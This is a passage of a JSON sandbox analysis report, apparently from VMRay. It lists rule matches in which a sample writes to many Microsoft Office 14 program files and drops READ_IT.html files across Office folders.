"built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart1.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26525", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart1.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26533", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26536", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26543", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26552", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26565", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26574", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26587", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26596", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26607", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26620", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26627", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26634", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26647", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26654", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26665", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2String.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\author2string.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26678", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\bibliography\\author2string.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26686", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\bibliography\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2XML.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\author2xml.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26689", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\bibliography\\author2xml.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\APA.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\style\\apa.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26696", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\bibliography\\style\\apa.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\style\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26746", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\bibliography\\style\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26788", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\bibliography\\sort\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\addins\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26809", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\addins\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\accwiz\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26839", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\accwiz\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\accessweb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26865", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\accessweb\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\3082\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\3082\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26876", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\3082\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1036\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1036\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26882", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1036\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_26889", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_28046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\vsdir\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_28052", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_28110", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_28712", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_28938", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft 